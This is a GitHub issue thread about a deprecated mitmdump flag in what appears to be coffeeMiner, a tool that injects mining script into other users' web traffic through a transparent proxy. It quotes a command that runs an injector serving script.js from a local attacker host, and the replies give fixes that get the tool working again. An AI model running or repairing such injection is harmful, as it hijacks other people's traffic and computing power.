Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

mitmdump: error: unrecognized arguments: -T #28

Open
IUliiu15 opened this issue May 8, 2018 · 5 comments
Open

mitmdump: error: unrecognized arguments: -T #28

IUliiu15 opened this issue May 8, 2018 · 5 comments

Comments

@IUliiu15
Copy link

IUliiu15 commented May 8, 2018

usage: mitmdump [options] [filter]
mitmdump: error: unrecognized arguments: -T
-T is deprecated, please use --mode transparent instead

the eror is from this code :
os.system("/usr/bin/mitmdump -s 'injector.py http://192.168.102:8000/script.js' -T")

But i do not get it, can someone help?

@BubbleZZ
Copy link

Same issue here

@sunsipeng
Copy link

sunsipeng commented Jun 1, 2018

  1. modify install.sh
    pip3 install --user mitmproxy==2.0.2

  2. reexecute sh install.sh

@BubbleZZ
Copy link

BubbleZZ commented Jun 1, 2018

@sunsipeng I get "Failed building wheel for crryptography" then at the end I get "Command "/usr/bin/python3 -u -c "import setuptools, tokenize;file='/tmp/pip-build-clepowqv/cryptography/setup.py';f=getattr(tokenize, 'open', open)(file);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, file, 'exec'))" install --record /tmp/pip-dolsd19y-record/install-record.txt --single-version-externally-managed --compile --user --prefix=" failed with error code 1 in /tmp/pip-build-clepowqv/cryptography/"

@phphubert
Copy link

Same issue here

@ismailkarsli
Copy link

Change "-T" to "--mode transparent" in coffeeMiner.py

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

5 participants